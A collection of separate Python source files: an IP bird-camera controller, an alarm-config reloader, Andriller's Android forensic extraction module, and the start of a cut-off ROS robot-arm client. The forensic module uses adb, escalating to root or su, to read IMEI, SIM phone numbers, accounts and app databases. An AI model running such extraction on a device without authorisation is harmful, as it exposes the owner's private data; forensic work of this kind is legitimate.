keys = {k:pygame.__dict__[k] for k in pygame.__dict__ if k[0:2] == "K_"}
click_point = None
# joystick
joystick = None
for i in range(pygame.joystick.get_count()):
js = pygame.joystick.Joystick(i)
print(f"Detected joystick {js.get_name()}")
if js.get_name() == "WingMan Force 3D":
joystick = js
break
joystick = None # TODO: delete this line
# Camera movement
last_hspeed = last_vspeed = 0
last_speed = 1
preset = (0, 0)
last_preset = (0, 0)
snapshot_held = False
horizontal = vertical = 0
hspeed = vspeed = 0
speed_modifier = 0.1
alternate = False
alternate_timer = time.time() + 0.25
# Information display
show_ui = True
horizontal_info = myfont.render('H 0 0', False, white)
vertical_info = myfont.render('V 0 0', False, white)
infrared_index = infrared.index(get_infrared())
ir_toggling = False
ir_info = myfont.render(f'IR {infrared[infrared_index]}', False, white)
ai_active = True
ai_info = myfont.render(f'AI {"Active" if ai_active else "Inactive"}', False, white)
processing_image = False
box_timer = time.time()
GOOD_BIRD = myfont.render(f'good bird', False, black)
set_name("birdcam")
set_time()
while True:
# Send images / receive bounds
if ai_active:
if processing_image:
if not boxes.empty():
box = boxes.get(False)
if box:
print(f"DETECTED: {box}")
bird_boxes = box
box_timer = time.time() + 15
processing_image = False
else:
snapshot = get_snapshot(high_quality=True)
image_queue.put(snapshot)
processing_image = True
# Get joystick axes
if joystick:
horizontal = joystick.get_axis(HORIZONTAL_AXIS)
vertical = joystick.get_axis(VERTICAL_AXIS)
speed_modifier = max((-joystick.get_axis(SPEED_AXIS) + 0.5)/1.5, 0)
# Get mouse/keyboard events
for event in pygame.event.get():
if event.type == pygame.QUIT: # x in titlebar
halt(image_process)
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_q:
halt(image_process)
elif event.key in range(pygame.K_0, pygame.K_9):
ctrl_preset(event.key - pygame.K_0)
elif event.key == pygame.K_LEFT:
horizontal = -1
elif event.key == pygame.K_RIGHT:
horizontal = 1
elif event.key == pygame.K_UP:
vertical = 1
elif event.key == pygame.K_DOWN:
vertical = -1
elif event.key == pygame.K_a:
ai_active = not ai_active
ai_info = myfont.render(f'AI {"Active" if ai_active else "Inactive"}', False, white)
elif event.key == pygame.K_EQUALS:
send_command('zoomin', 50)
elif event.key == pygame.K_MINUS:
send_command('zoomout', 50)
elif event.key == pygame.K_RIGHTBRACKET:
send_command('focusin', 50)
elif event.key == pygame.K_LEFTBRACKET:
send_command('focusout', 50)
elif event.key == pygame.K_SPACE:
display.fill(white)
pygame.display.update()
take_snapshot(client)
elif event.key == pygame.K_i:
infrared_index = (infrared_index + 1) % 3
ir_info = myfont.render(f'IR {infrared[infrared_index]}'.replace("open", "on").replace("close", "off"), False, white)
toggle_infrared(infrared_index)
elif event.key == pygame.K_u:
show_ui = not show_ui
elif event.key == pygame.K_LSHIFT:
speed_modifier = 1
elif event.key == pygame.K_LCTRL:
speed_modifier = 0.01
else:
for k in keys:
if keys[k] == event.key:
print(k)
break
elif event.type == pygame.KEYUP:
if event.key == pygame.K_LEFT and horizontal == -1:
horizontal = 0
elif event.key == pygame.K_RIGHT and horizontal == 1:
horizontal = 0
if event.key == pygame.K_UP and vertical == 1:
vertical = 0
elif event.key == pygame.K_DOWN and vertical == -1:
vertical = 0
elif event.key in (pygame.K_LSHIFT, pygame.K_LCTRL):
speed_modifier = 0.1
if event.key in (pygame.K_LEFTBRACKET, pygame.K_RIGHTBRACKET, pygame.K_EQUALS, pygame.K_MINUS):
send_command('stop')
elif event.type == pygame.MOUSEBUTTONDOWN:
pos = event.pos
click_point = pos
elif event.type == pygame.JOYBUTTONDOWN:
if joystick.get_button(ZOOM_IN):
send_command('zoomin', 0)
if joystick.get_button(ZOOM_OUT):
send_command('zoomout', 0)
if joystick.get_button(FOCUS_IN):
send_command('focusin', 0)
if joystick.get_button(FOCUS_OUT):
send_command('focusout', 0)
if joystick.get_button(SNAPSHOT):
if not snapshot_held:
display.fill(white)
pygame.display.update()
take_snapshot(client)
snapshot_held = True
if joystick.get_button(IR_TOGGLE):
if not ir_toggling:
ir_toggling= True
infrared_index = (infrared_index + 1) % 3
ir_info = myfont.render(f'IR {infrared[infrared_index]}'.replace("open", "on").replace("close", "off"), False, white)
toggle_infrared(infrared_index)
elif event.type == pygame.JOYBUTTONUP:
if not joystick.get_button(IR_TOGGLE):
ir_toggling = False
send_command('stop')
last_hspeed = last_vspeed = 0
if not joystick.get_button(SNAPSHOT):
snapshot_held = False
# Pan and Tilt
hspeed = (max(abs(horizontal) - HORIZONTAL_DEADZONE, 0)/(1 - HORIZONTAL_DEADZONE))**2 * speed_modifier
vspeed = (max(abs(vertical) - VERTICAL_DEADZONE, 0)/(1 - VERTICAL_DEADZONE))**2 * speed_modifier
if vspeed <= SPEED_THRESHOLD and hspeed <= SPEED_THRESHOLD and (last_vspeed > SPEED_THRESHOLD or last_hspeed > SPEED_THRESHOLD):
send_command('stop')
elif vspeed > SPEED_THRESHOLD and hspeed > SPEED_THRESHOLD:
if alternate:
if alternate_timer <= time.time():
alternate = not alternate
alternate_timer = time.time() + 0.25
send_command('left' if horizontal < 0 else 'right', round(hspeed * 2 * (SPEED_RANGE[1]-SPEED_RANGE[0]) + SPEED_RANGE[0]))
else:
if alternate_timer <= time.time():
alternate = not alternate
alternate_timer = time.time() + 0.25
send_command('down' if vertical < 0 else 'up', round(vspeed * 2 * (SPEED_RANGE[1]-SPEED_RANGE[0]) + SPEED_RANGE[0]))
elif vspeed > SPEED_THRESHOLD:
send_command('down' if vertical < 0 else 'up', round(vspeed * (SPEED_RANGE[1]-SPEED_RANGE[0]) + SPEED_RANGE[0]))
elif hspeed > SPEED_THRESHOLD:
send_command('left' if horizontal < 0 else 'right', round(hspeed * (SPEED_RANGE[1]-SPEED_RANGE[0]) + SPEED_RANGE[0]))
if joystick:
preset = joystick.get_hat(PRESET_HAT)
if preset != (0, 0) and preset != last_preset:
ctrl_preset(presets.index(preset))
last_vspeed, last_hspeed = vspeed, hspeed
last_preset = preset
last_speed = speed_modifier
# Display the latest image
raw_snapshot = get_snapshot()
"""
frame = yolo_all.load_image(raw_snapshot)
# Use every frame to calculate the foreground mask and update
# the background
fg_mask = back_sub.apply(frame)
# Close dark gaps in foreground object using closing
fg_mask = cv2.morphologyEx(fg_mask, cv2.MORPH_CLOSE, kernel)
# Remove salt and pepper noise with a median filter
fg_mask = cv2.medianBlur(fg_mask, 5)
fg_mask = cv2.erode(fg_mask,kernel,iterations = 3)
cv2.imshow('mask', fg_mask)
# Threshold the image to make it either black or white
_, fg_mask = cv2.threshold(fg_mask,127,255,cv2.THRESH_BINARY)
# Find the index of the largest contour and draw bounding box
fg_mask_bb = fg_mask
contours, hierarchy = cv2.findContours(fg_mask_bb,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)[-2:]
areas = [cv2.contourArea(c) for c in contours]
# If there are no countours
if len(areas) > 0:
for max_index in range(len(areas)):
# Draw the bounding box
cnt = contours[max_index]
x,y,w,h = cv2.boundingRect(cnt)
cv2.rectangle(frame,(x,y),(x+w,y+h),(0,255,0),3)
is_success, buffer = cv2.imencode(".jpg", frame) # io.BytesIO(raw_snapshot)
image = pygame.image.load(io.BytesIO(buffer))
"""
image = pygame.image.load(io.BytesIO(raw_snapshot))
image = pygame.transform.scale(image, display_size)
display.blit(image, (0,0))
# Display control information
if show_ui:
pygame.draw.rect(display,black,(5,30,240,150))
pygame.draw.circle(display,black,((display_size[0]-10)/2,(display_size[1]-10)/2), 10, 3)
horizontal_info = myfont.render(f'H {hspeed:.3f}', False, white)
vertical_info = myfont.render(f'V {vspeed:.3f}', False, white)
speed_info = myfont.render(f'S {speed_modifier:.3f}', False, white)
display.blit(horizontal_info, (5,30))
display.blit(vertical_info, (5,60))
display.blit(speed_info, (5,90))
display.blit(ir_info, (5,120))
display.blit(ai_info, (5,150))
if click_point:
pygame.draw.circle(display, (255,0,0), click_point, 3, 3)
for box in bird_boxes:
x1,y1,x2,y2, label, confidence = box
scale = (display_size[0]/hq_size[0], display_size[1]/hq_size[1])
rect = (x1*scale[0], y1*scale[1], (x2-x1)*scale[0], (y2-y1)*scale[1])
#pygame.draw.rect(display, black, rect, width=2)
if label == "bird":
display.blit(GOOD_BIRD, ((rect[0]+rect[2])/2, (rect[1]+rect[3])/2))
if bird_boxes and time.time() > box_timer:
bird_boxes = []
# Update the screen
pygame.display.update()
display.fill(black)
def halt(image_process):
if image_process:
image_process.terminate()
image_process.join()
exit()
def send_command(name, speed=1):
if speed > SPEED_RANGE[1] - 1:
speed = 0 # speed 0 goes faster than max speed
request = f"http://{IP_ADDRESS}/cgi-bin/hi3510/ptzctrl.cgi?-step=0&-act={name}&-speed={int(round(speed))}"
return requests.get(request, auth=AUTH)
def ctrl_preset(name):
request = f"http://{IP_ADDRESS}/cgi-bin/hi3510/preset.cgi?-act=goto&-number={name}"
return requests.get(request, auth=AUTH)
def set_preset(name):
request = f"http://{IP_ADDRESS}/cgi-bin/hi3510/preset.cgi?-act=set&-status=1&-number={name}"
return requests.get(request, auth=AUTH)
def get_snapshot(high_quality=False):
request = f"http://{IP_ADDRESS}/tmpfs/{'snap' if high_quality else 'auto'}.jpg"
response = requests.get(request, auth=AUTH)
return response._content
def save_hqsnapshot(filename):
content = get_snapshot(high_quality=True)
with open(filename, "wb") as f:
f.write(content)
def save_rtsp_snapshot(rtsp_client, filename):
pygame.time.wait(500) # wait for the video feed to catch up
snapshot = rtsp_client.read()
snapshot.save(filename)
def take_snapshot(rtsp_client=None):
filename = datetime.now().strftime("%Y%m%d-%H%M%S.jpg")
if rtsp_client:
threading.Thread(target=save_rtsp_snapshot, args=[rtsp_client, filename]).start()
else:
threading.Thread(target=save_hqsnapshot, args=[filename,]).start()
def toggle_infrared(index):
request = f"http://{IP_ADDRESS}/cgi-bin/hi3510/param.cgi?cmd=setinfrared&-infraredstat={infrared[index]}"
return requests.get(request, auth=AUTH)
def get_infrared():
request = f"http://{IP_ADDRESS}/cgi-bin/hi3510/param.cgi?cmd=getinfrared"
return requests.get(request, auth=AUTH)._content.decode("utf8").strip().split("=")[-1][1:-2]
def set_name(name):
request = f"http://{IP_ADDRESS}/web/cgi-bin/hi3510/param.cgi?cmd=setoverlayattr&-region=1&-show=1&-name={quote(name)}"
return requests.get(request, auth=AUTH)
def set_time():
current_time = datetime.now().strftime("%Y.%m.%d.%H.%M.%S")
request = f"http://{IP_ADDRESS}/web/cgi-bin/hi3510/param.cgi?cmd=setservertime&-time={current_time}"
return requests.get(request, auth=AUTH)
def load_config():
request = f"http://{IP_ADDRESS}/web/cgi-bin/hi3510/param.cgi?cmd=getlanguage&cmd=getvideoattr&cmd=getimageattr&cmd=getsetupflag&cmd=getimagemaxsize&cmd=getaudioflag&cmd=getserverinfo&cmd=getvideoattr&cmd=getircutattr&cmd=getinfrared&cmd=getrtmpattr&cmd=gethttpport&cmd=getlampattrex"
response = requests.get(request, auth=AUTH)
config = {}
for line in response._content.decode("utf8").strip().split("\r\n"):
k, v = line[4:].split("=")
config[k] = v
return config
if __name__ == "__main__":
main()
|
load_alarm_config.py
|
import threading
import time
from server_common.utilities import print_and_log
class AlarmConfigLoader(object):
"""
Alarm configuration loader class will create a new configuration and load it into the alarm server. While the
instance exists it will count down when it get to 0 it will no longer be the current instance and will then
restart the alarm server with a new config
Currently it does this by restarting the alarm server after a delay. It is a singleton there is only one
at any one time.
"""
# Instance of this singleton
_instance = None
# Number of seconds to delay the reload by so that IOC has started and published its alarmed PVs
DELAY = 20
# lock for accessing the delay and instance variables.
lock = threading.Lock()
thread = None
def __init__(self, ioc_control):
"""
Constructor
:param ioc_control: ioc control class to enable this class to restart the Alarm IOC
"""
self._delay_left = AlarmConfigLoader.DELAY
self._ioc_control = ioc_control
def run(self):
"""
Delay until the time has run out then recreate the alarm config and reload it. This method should be called in
a thread because it is blocking
"""
while self._is_still_delayed():
time.sleep(1)
self._ioc_control.restart_ioc("ALARM", force=True)
def do_reset_alarm(self):
"""
Thread safe way to restart the counter
:return:
"""
with AlarmConfigLoader.lock:
self._delay_left = AlarmConfigLoader.DELAY
print_and_log("Alarm server will update in {0} seconds from now".format(self._delay_left))
def _is_still_delayed(self):
"""
Reduce the delay by 1 and check if it has run out. If it is no longer delayed remove this instance
:return: True if still delayed; False otherwise
"""
with AlarmConfigLoader.lock:
self._delay_left -= 1
if self._delay_left > 0:
return True
AlarmConfigLoader._instance = None
return False
@staticmethod
def restart_alarm_server(ioc_control):
instance = AlarmConfigLoader._get_instance(ioc_control)
instance.do_reset_alarm()
@staticmethod
def _get_instance(ioc_control):
"""
Get the instance of the load alarm config
:param ioc_control (BlockServer.core.ioc_controlIocControl):
:return (AlarmConfigLoader): instance of the alarm config loader
"""
with AlarmConfigLoader.lock:
if AlarmConfigLoader._instance is None:
AlarmConfigLoader._instance = AlarmConfigLoader(ioc_control)
AlarmConfigLoader.thread = threading.Thread(target=AlarmConfigLoader._instance.run)
AlarmConfigLoader.thread.start()
return AlarmConfigLoader._instance
|
driller.py
|
import os
import re
import time
import shutil
import logging
import tarfile
import pathlib
import tempfile
import webbrowser
import threading
from contextlib import suppress
from timeout_decorator.timeout_decorator import TimeoutError
from . import utils
from . import engines
from . import messages
from . import decoders
from . import adb_conn
logger = logging.getLogger(__name__)
# -----------------------------------------------------------------------------
class ChainExecution:
USER = 'shell'
ROOT = 'root'
ROOTSU = 'root-su'
DATA_STORE = 'DataStore.tar'
extract_dir = 'data'
def __init__(self, base_dir, status_msg=None, use_adb=False, **kwargs):
self.tools = utils.DrillerTools()
self.base_dir = base_dir
self.work_dir = None
self.updater = status_msg
if use_adb:
self.adb = adb_conn.ADBConn()
self.registry = decoders.Registry()
self.targets = None
self.REPORT = {}
self.DECODED = []
self.DOWNLOADS = []
self.DataStore = None
self.do_shared = kwargs.get('do_shared', False)
self.backup = kwargs.get('backup')
# self.backup_pw = kwargs.get('backup_pw') # TODO
self.tarfile = kwargs.get('tarfile')
self.src_dir = kwargs.get('src_dir')
self.WB = None
self.logger = kwargs.get('logger', logger)
def setup(self):
if not os.path.exists(self.output_dir):
os.makedirs(self.output_dir)
data_store = os.path.join(self.work_dir, self.DATA_STORE)
self.DataStore = tarfile.open(data_store, 'a')
def CleanUp(self):
self.DataStore.close()
datastore_file = os.path.abspath(self.DataStore.fileobj.name)
utils.hash_file(datastore_file)
# Delete temp tar file
default_temp = tempfile.gettempdir()
tf = self.tarfile
if tf and os.path.isfile(tf) and tf.startswith(default_temp):
os.remove(tf)
self.update('Finished.')
def update(self, msg, info=True):
self.logger.info(msg) if info else logger.debug(msg)
if self.updater:
self.updater.set(msg)
self.updater._root.update()
def InitialAdbRead(self):
self.update('Reading information...')
def get_permission():
self.su = False
if 'root' in self.adb('shell id'):
self.permisson = self.ROOT
return self.permisson
try_su = self.adb('shell id', su=True)
if try_su is not None and self.ROOT in try_su:
self.permisson = self.ROOTSU
self.su = True
else:
self.permisson = self.USER
return self.permisson
def get_prop(prop: list, key: str):
for row in prop:
if key in row:
return row.strip().split('=')[1]
def get_wifi(dump: list):
dump = list(filter(lambda x: x.startswith('mWifiInfo'), dump))
if dump:
src = re.search(r'MAC: ([:0-9a-f]{17}),', dump[0])
if src:
return src.groups()[0]
def get_accounts(dump):
accs = re.findall(r'Account \{name=(.+?), type=(.+?)\}', dump, re.S)
return [(v, k) for k, v in accs]
# Serial, status, permissions
self.REPORT['serial'], self.REPORT['status'] = self.adb.device()
self.REPORT['permisson'] = get_permission()
# Build Props
with suppress(TimeoutError):
build_prop = self.adb('shell cat /system/build.prop', su=self.su, timeout=5)
if build_prop:
build_prop = build_prop.split('\n')
props = [
'ro.product.manufacturer',
'ro.product.model',
'ro.build.version.release',
'ro.build.display.id']
for p in props:
self.REPORT[p] = get_prop(build_prop, p)
# WIFI
with suppress(TimeoutError):
_wifi = self.adb('shell dumpsys wifi', timeout=5)
if _wifi:
self.REPORT['wifi mac'] = get_wifi(_wifi.split('\n'))
# IMEI
with suppress(TimeoutError):
_usbinfo = self.adb('shell dumpsys iphonesubinfo', timeout=5)
if _usbinfo:
self.REPORT['imei'] = get_prop(_usbinfo.split('\n'), 'Device ID')
# IMEI for Android v6+
# with suppress(TimeoutError):
# rex = re.compile(b' ([0-9a-f]{8})')
# _data = self.adb('adb shell service call iphonesubinfo 1', timeout=2)
# if _data and len(_data) > 9:
# plen = int(b''.join(_data[:2]), 16)
# Time
with suppress(TimeoutError):
self.REPORT['local_time'] = time.strftime('%Y-%m-%d %H:%M:%S %Z')
rtime = self.adb(['shell', 'date', r'+%F\ %T\ %Z'], timeout=5)
self.REPORT['device_time'] = rtime.split(self.adb.rmr.decode())[-1]
# SIM Card
with suppress(TimeoutError, Exception):
if self.adb.exists('/data/system/SimCard.dat'):
_simdat = self.adb('shell cat /data/system/SimCard.dat', su=self.su, timeout=5)
sims = [
'CurrentSimSerialNumber',
'CurrentSimPhoneNumber',
'CurrentSimOperatorName',
'PreviousSimSerialNumber',
'PreviousSimPhoneNumber']
if _simdat:
_simdat = _simdat.split('\n')
for s in sims:
self.REPORT[s] = get_prop(_simdat, s)
# Accounts
with suppress(TimeoutError):
_acc = self.adb('shell dumpsys account', timeout=5)
self.REPORT['accounts'] = get_accounts(_acc)
@staticmethod
def clean_name(value):
return re.sub(r'[\s\/:*?"<>|]', '', value)
def CreateWorkDir(self):
date_ = time.strftime('%Y-%m-%d')
time_ = time.strftime('%H.%M.%S')
try:
self.work_dir = os.path.join(
self.base_dir,
'{}_{}_{}_{}'.format(
self.clean_name(
self.REPORT.get('ro.product.manufacturer', self.REPORT['serial'])),
self.clean_name(
self.REPORT.get('ro.product.model', self.REPORT['permisson'])),
date_, time_,))
except Exception:
self.work_dir = os.path.join(self.base_dir, f'andriller_extraction_{date_}_{time_}')
self.output_dir = os.path.join(self.base_dir, self.work_dir, self.extract_dir)
self.logger.debug(f'work_dir:{self.work_dir}')
self.logger.debug(f'output_dir:{self.output_dir}')
self.setup()
def download_file(self, file_path):
"""
Return values:
True = file downloaded
False = file does not exist, or failed to get in full size
None = file exists but has no size
"""
file_remote = self.adb.exists(file_path, su=self.su)
if file_remote:
file_name = os.path.basename(file_remote)
file_local = os.path.join(self.output_dir, file_name)
remote_size = self.adb.get_size(file_path, su=self.su)
file_saveas = os.path.join(
os.path.split(file_local)[0],
os.path.split(file_remote)[1])
if remote_size == 0:
return None
self.logger.info(f'{file_remote} ({remote_size} bytes)')
if self.permisson == self.ROOT:
self.adb.pull_file(file_path, file_local)
if os.path.exists(file_local):
self.DataStore.add(file_saveas, file_remote)
self.DOWNLOADS.append(file_name)
return True
elif self.permisson == self.ROOTSU:
for _ in range(100):
file_obj = self.adb.get_file(file_path, su=self.su)
if file_obj:
# remote_size = remote_size if remote_size else len(file_obj)
if len(file_obj) == remote_size:
with open(file_saveas, 'wb') as W:
W.write(file_obj)
self.DataStore.add(file_saveas, file_remote)
self.DOWNLOADS.append(file_name)
return True
time.sleep(0.25)
self.logger.debug(f'Trying again for {file_name} ({len(file_obj)} bytes)')
else:
self.logger.warning(f'Failed getting file: {file_name}')
return False
def do_backup(self, ALL=True, shared=False, backup_name='backup.ab'):
backup_file = os.path.join(self.work_dir, backup_name)
cmd = [
'backup',
'-shared' if shared else '',
'-all' if ALL else '',
'-f',
backup_file,
]
com = threading.Thread(target=lambda: self.adb(cmd))
com.start()
if self.updater:
messages.msg_do_backup()
while com.is_alive():
time.sleep(0.5)
if os.path.exists(backup_file):
_size = os.path.getsize(backup_file)
self.update(f'Reading backup: {utils.human_bytes(_size)}', info=False)
self.backup = backup_file
def AndroidBackupToTar(self):
self.update('Unpacking backup...')
self.tarfile = self.tools.ab_to_tar(self.backup)
def ExtractFromTar(self, targets=[]):
self.update('Extracting from backup...')
for fn in self.tools.extract_form_tar(
self.tarfile,
self.output_dir,
targets=targets):
self.DataStore.add(os.path.join(self.output_dir, fn), fn)
self.DOWNLOADS.append(fn)
def get_targets(self):
self.targets = [*map(pathlib.PurePath, self.registry.get_posix_links)]
def in_targets(self, target):
if not self.targets:
self.get_targets()
target = pathlib.PureWindowsPath(target).as_posix()
for f in self.targets:
if f.match(target):
return True
return False
@staticmethod
def extract_form_dir(src_dir):
src_dir_path = pathlib.Path(src_dir)
for fobj in src_dir_path.rglob('**/*'):
if fobj.is_file():
yield fobj
def ExtractFromDir(self):
self.update('Extracting from directory...')
src_dir_path = pathlib.Path(self.src_dir)
for fobj in self.extract_form_dir(self.src_dir):
fn = fobj.relative_to(src_dir_path)
if self.in_targets(fn.name):
self.logger.info(fn.name)
shutil.copy2(fobj, os.path.join(self.output_dir, fn.name))
self.DOWNLOADS.append(os.path.basename(fn))
def enumerate_files(self, target_dir='/'):
FILES = []
for f in self.adb_iter(f'find {target_dir} -type f -readable'):
FILES.append(f)
def DataAcquisition(self, run_backup=False, shared=False):
self.update('Acquiring data...')
if not run_backup and self.ROOT in self.permisson:
if shared:
self.update('Acquiring shared storage...')
self.do_backup(ALL=False, shared=True, backup_name='shared.ab')
self.update('Acquiring databases via root...')
for file_path in self.registry.get_root_links:
self.download_file(file_path)
elif run_backup or self.permisson == self.USER:
self.do_backup(shared=shared)
if self.backup and os.path.getsize(self.backup) <= 2 ** 10:
self.logger.error('Android backup failed - too small.')
self.backup = False
def DataExtraction(self):
self.update('Extracting data from source...')
if self.backup:
self.AndroidBackupToTar()
if self.tarfile:
targets = self.registry.get_all_links
# Perhaps change to posix links?
self.ExtractFromTar(targets=targets)
# if self.DataStore and self.DataStore.members:
# pass # TODO!
def DecodeShared(self):
try:
if self.backup or (self.do_shared and self.backup):
self.update('Decoding shared filesystem...')
deco = decoders.SharedFilesystemDecoder(self.work_dir, self.backup)
self.DECODED.append([deco.report_html(), f'{deco.title} ({len(deco.DATA)})'])
except Exception as err:
logger.exception(f'Shared decoder error: {err}')
def DataDecoding(self):
self.update('Decoding extracted data...')
self.logger.debug(self.DOWNLOADS)
workbook = self.get_master_workbook()
for file_name in filter(None.__ne__, self.DOWNLOADS):
if self.registry.has_target(file_name):
for deco_class in self.registry.decoders_target(file_name):
file_path = os.path.join(self.output_dir, file_name)
try:
self.logger.info(f'Decoding {file_name} using {deco_class.__name__}')
deco = deco_class(self.work_dir, file_path)
if not deco.template_name:
continue
self.DECODED.append([deco.report_html(), f'{deco.title} ({len(deco.DATA)})'])
deco.report_xlsx(workbook=workbook)
except Exception as e:
logger.error(f'Decoding error for `{os.path.basename(file_name)}`: {e}')
logger.exception(str(e))
def GenerateHtmlReport(self, open_html=True):
self.update('Generating HTML report...')
env = engines.get_engine()
template_name = 'REPORT.html'
template = env.get_template(template_name)
report_file = os.path.join(self.work_dir, template_name)
with open(report_file, 'w') as W:
W.write(template.render(
report=self.REPORT.items(),
decoded=self.DECODED,
**engines.get_head_foot()))
if open_html:
report_uri = pathlib.Path(report_file).as_uri()
webbrowser.open_new_tab(report_uri)
def get_master_workbook(self):
self.WB = engines.Workbook(self.work_dir, 'REPORT')
self.summary_sheet = self.WB.add_sheet('Summary')
self.WB.write_header(self.summary_sheet, ['Extraction Summary'])
return self.WB
def GenerateXlsxReport(self):
self.update('Generating XLSX report...')
for row, summary in enumerate(self.DECODED, start=1):
self.summary_sheet.write_row(row, 0, summary[1:])
self.WB.close()
# -----------------------------------------------------------------------------
class DecodingError(Exception):
pass
|
stx_controller_TCP_client.py
|
#!/usr/bin/env python
from __future__ import print_function
import threading
import time
import rospy
import math
import actionlib
import signal
import json
import os
from std_msgs.msg import Empty
from control_msgs.msg import FollowJointTrajectoryAction, FollowJointTrajectoryGoal
from trajectory_msgs.msg import JointTrajectory, JointTrajectoryPoint
from sensor_msgs.msg import JointState
from stx_control.srv import stx_manager_service, stx_manager_serviceResponse
from stxlib.tcp_move.basic_client import BasicClient
from msg_state import MsgState
MC_IP = '90.0.0.1'
ROBOT_SPEED = 15
TCP_IP = MC_IP
TCP_PORT = 6001
MOVEMENT_TIMEOUT = 60
GRIPPER_TIMEOUT = 3
CLEAN_TABLE_TIMEOUT = 40
D_TIME_OUT = 20
I_TIME_OUT = 2
motion_status = threading.Event()
my_mutex = threading.Lock()
# ----------------------------------------------------Arm---------------------------------------------------------------
class StxControllerServerArm:
def __init__(self):
self.server = actionlib.SimpleActionServer('/arm_controller/follow_joint_trajectory',
FollowJointTrajectoryAction,
self.execute,
False)
self.server.start()
self.planing_request_publisher = rospy.Publisher('/rviz/moveit/update_goal_state',
Empty,
queue_size=20)
def execute(self, goal):
"""
:type goal: FollowJointTrajectoryGoal
"""
try:
# get the msg counter from MC
msg_id = tn.getMsgCounter()
create_and_put_in_dictionary(msg_id, None, None, True)
tn.enableGroup(65)
rospy.loginfo('ACTION GOAL - arm_controller_tcp INVOKED!')
if not motion_status.wait(timeout=I_TIME_OUT):
rospy.logerr('TOOK TOO LONG FOR MC TO RESPOND')
self.server.set_aborted()
my_mutex.acquire()
obj = msg_state_dictionary[str(msg_id)]
obj.dead = True
my_mutex.release()
else:
motion_status.clear()
arm_msg_id = send_trajectory_to_server(goal.trajectory, self.server)
# waiting for 60 seconds to finish moving the arm
if not motion_status.wait(timeout=MOVEMENT_TIMEOUT):
rospy.logerr('TOOK TOO LONG TO EXECUTE MOVEMENT - EXECUTION ABORTED ')
self.server.set_aborted()
my_mutex.acquire()
obj = msg_state_dictionary[str(arm_msg_id)]
my_mutex.release()
obj.dead = True
else:
motion_status.clear()
self.planing_request_publisher.publish()
except Exception as e:
print("Exiting: SimpleActionServer...")
def send_trajectory_to_server(goal_trajectory, srv):
"""
:type goal_trajectory: JointTrajectory
"""
points = goal_trajectory.points # type: list[JointTrajectoryPoint]
last_point = points[points.__len__() - 1].positions
print(last_point)
last_point_deg = map(math.degrees, last_point)
# get the msg counter from MC
msg_id = tn.getMsgCounter()
create_and_put_in_dictionary(msg_id, srv.set_succeeded, srv.set_aborted, False)
# print("just inserted msg number: {}".format(msg_id))
# TO EDIT THE MOVING SPEED OF THE ROBOT CHANGE THE LAST PARAMETER FROM 10 TO DESIRED SPEED
tn.grJoints(65, last_point_deg[0], last_point_deg[1], last_point_deg[2], last_point_deg[3], last_point_deg[4],
ROBOT_SPEED)
if not motion_status.wait(timeout=I_TIME_OUT):
rospy.logerr('TOOK TOO LONG FOR MC TO RESPOND')
my_mutex.acquire()
obj = msg_state_dictionary[str(msg_id)]
obj.dead = True
my_mutex.release()
srv.set_aborted()
motion_status.clear()
motion_status.clear()
return msg_id
# ----------------------------------------------------Gripper-----------------------------------------------------------
class StxControllerServerGripper:
def __init__(self):
self.server = actionlib.SimpleActionServer('/gripper_controller/follow_joint_trajectory',
FollowJointTrajectoryAction,
self.execute,
False)
self.server.start()
self.msg_gripper = init_gripper_msg()
self.pub = rospy.Publisher('joint_states', JointState, queue_size=10)
t_gripper_publisher = threading.Thread(target=self.publish_to_joint_state)
t_gripper_publisher.start()
def publish_to_joint_state(self):
try:
rate = rospy.Rate(50) # 50hz/20ms
while not rospy.is_shutdown():
self.msg_gripper.header.stamp = rospy.Time.now()
self.pub.publish(self.msg_gripper)
rate.sleep()
except Exception as e:
print("EXITING: publisher thread...")
def execute(self, goal):
"""
:type goal: FollowJointTrajectoryGoal
"""
try:
msg_id = tn.getMsgCounter()
create_and_put_in_dictionary(msg_id, None, None, True)
tn.enableGroup(65)
rospy.loginfo('ACTION GOAL - gripper_controller_tcp INVOKED!')
if not motion_status.wait(timeout=I_TIME_OUT):
rospy.logerr('TOOK TOO LONG FOR MC TO RESPOND')
self.server.set_aborted()
my_mutex.acquire()
obj = msg_state_dictionary[str(msg_id)]
obj.dead = True
my_mutex.release()
motion_status.clear()
else:
motion_status.clear()
msg_gripper, msg_gripper_id = send_gripper_action_to_server(self, goal.trajectory)
# waiting for GRIPPER_TIMEOUT seconds to finish moving the Gripper
if not motion_status.wait(timeout=GRIPPER_TIMEOUT):
rospy.logerr('TOOK TOO LONG TO EXECUTE GRIPPER ACTION - EXECUTION ABORTED ')
self.server.set_aborted()
my_mutex.acquire()
obj = msg_state_dictionary[str(msg_gripper_id)]
obj.dead = True
my_mutex.release()
motion_status.clear()
return
motion_status.clear()
self.msg_gripper = msg_gripper
rospy.loginfo("GRIPPER ACTION IS DONE! ")
except Exception as e:
print("Exiting: SimpleActionServer...")
def send_gripper_action_to_server(gripper, goal_trajectory):
"""
:type goal_trajectory: JointTrajectory
"""
points = goal_trajectory.points # type: list[JointTrajectoryPoint]
gripper_state = points[points.__len__() - 1].positions[0] + points[points.__len__() - 1].positions[1]
# print(points[points.__len__() - 1].positions)
if gripper_state > 0.05:
msg_id = tn.getMsgCounter()
create_and_put_in_dictionary(msg_id, gripper.server.set_succeeded, gripper.server.set_aborted, True)
tn.gripperClose()
rospy.loginfo("Gripper is closing")
else:
msg_id = tn.getMsgCounter()
create_and_put_in_dictionary(msg_id, gripper.server.set_succeeded, gripper.server.set_aborted, True)
tn.gripperOpen()
rospy.loginfo("Gripper is: opening")
# construct the msg to 'Joint State' topic
joint_names = rospy.get_param('/gripper_controller_joint_names')
# joint_names = ['gripper_left_joint', 'gripper_right_joint']
msg_gripper = JointState()
msg_gripper.name = joint_names
msg_gripper.header.stamp = rospy.Time.now()
msg_gripper.position = points[points.__len__() - 1].positions
msg_gripper.header.stamp = rospy.Time.now()
msg_gripper.velocity = [1.0, 1.0]
msg_gripper.effort = [1.0, 1.0]
return msg_gripper, msg_id
def init_gripper_msg():
try:
msg_gripper = JointState()
msg_gripper.name = ['gripper_left_joint', 'gripper_right_joint']
msg_gripper.position = [0.0, 0.0]
msg_gripper.velocity = [1.0, 1.0]
msg_gripper.effort = [1.0, 1.0]
msg_gripper.header.stamp = rospy.Time.now()
return msg_gripper
except Exception as e:
print("Exiting: main thread - exception...")
# ---------------------------------------Helpers------------------------------------------------------------------
def handle_service_command(req):
